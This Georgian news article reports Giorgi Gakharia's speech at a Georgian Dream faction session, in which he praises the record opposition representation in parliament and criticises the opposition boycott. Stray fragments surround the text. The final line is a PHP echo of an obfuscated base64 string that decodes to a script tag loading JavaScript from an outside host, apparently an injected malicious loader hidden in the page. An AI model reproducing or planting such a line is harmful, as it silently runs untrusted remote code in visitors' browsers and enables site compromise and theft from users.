celsiusi
ავერსი შნაიდერი
ჩვენ საქართველოს ისტორიაში პირველად, პარლამენტში 9 პოლიტიკური გაერთიანება და 60 ოპოზიციური მანდატი მივიღეთ. მე უბრალოდ არ მესმის, რა შეიძლება იყოს მიზეზი იმის, რომ ქართულმა პოლიტიკურმა სპექტრმა დემოკრატიზაციის ეს მიღწევა არ გამოიყენოს, - ამის შესახებ საქართველოს პრემიერ-მინისტრობის კანდიდატმა გიორგი გახარიამ ფრაქცია "ქართული ოცნების" სხდომაზე სიტყვით გამოსვლისას განაცხადა.
 
მისივე თქმით, მოქალაქეებმა 31 ოქტომბერს ხმა მისცეს მეტ პლურალიზმს და მეტ წარმომადგენლობას პარლამენტში.
 
"ჩვენ დღეს გვაქვს უფრო პროპორციული სისტემა და პირველად ქვეყნის ისტორიაში, საკანონმდებლო დონეზე დადასტურდა, რომ 2024 წლის არჩევნები იქნებოდა სრულად პროპორციული. ეს ნიშნავს, რომ ქვეყანაში პოლიტიკური პლურალიზმი დაკანონებულია და ხდება პოლიტიკური პროცესის ძირითადი მდგენელი. ეს ჩვენმა მოქალაქეებმა დარწმუნებული ვარ გაიგეს ზედმიწევნით ზუსტად. სწორედ ამიტომ, 31 ოქტომბერს, პანდემიის პირობებში 2 მილიონამდე მოქალაქე მივიდა და მისცა ხმა. მათ ხმა მისცეს მეტ პლურალიზმს, პარლამენტში მეტ წარმომადგენლობას. საბოლოო ჯამში, თითოეულ თქვენგანს და იმ ბატონებსაც, რომლებიც დღეს აქ არ არიან, მისცეს კონკრეტული დავალება, კრიზისის პირობებში გაუმკლავდით ამ კრიზისს, მართეთ ქვეყანა ერთად და იზრუნეთ ჩვენზე ერთად. ეს არის პასუხისმგებლობა და ამ პასუხისმგებლობის დელეგირება მოხდა. საბოლოო ჯამში, ჩვენ მივიღეთ საქართველოს ისტორიაში პირველად 9 პოლიტიკური გაერთიანება პარლამენტში და 60 ოპოზიციური მანდატი. მე უბრალოდ არ მესმის, რა შეიძლება იყოს მიზეზი იმის, რომ ქართულმა პოლიტიკურმა სპექტრმა დემოკრატიზაციის ეს მიღწევა არ გამოიყენოს. შეუძლებელია ამაზე ადეკვატური პასუხის გაცემა. ამასთან, საპირისპირო მხრიდან აშკარა იყოს სახელმწიფო ინსტიტუტებსა და თვითონ სახელმწიფოზე დელეგიტიმაციის პროცესი, რომელიც დღეს ყოველდღიურად გრძელდება.
 
ვფიქრობ, რომ ამას შემდგომი არჩევნების პირობებში საქართველოს მოქალაქე მისცემს შესაბამის შეფასებას. ვერავის ვერ ვაიძულებთ იყოს საქართველოს პარლამენტში და განახორციელოს ის მანდატი, ის ვალდებულება და პასუხისმგებლობა, რომელიც მათ დააკისრა საქართველოს მოქალაქემ. ამას ხომ ძალით ვერ გავაკეთებინებთ, ეს ხომ მათი არჩევანის საკითხია?! ამ პოლიტიკურ არჩევანსა და ამ პოლიტიკურ ნაბიჯს, რა თქმა უნდა, საქართველოს მოქალაქე, როგორც კი მას ეს შესაძლებლობა ექნება და ექნება შემდგომი არჩევნების პირობებში, მათ შორის, მუნიციპალურ არჩევნებზე, შესაბამის შეფასებას მისცემს. მე ამაში დარმწუნებული ვარ,“ - განაცხადა გიორგი გახარიამ.
1846
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");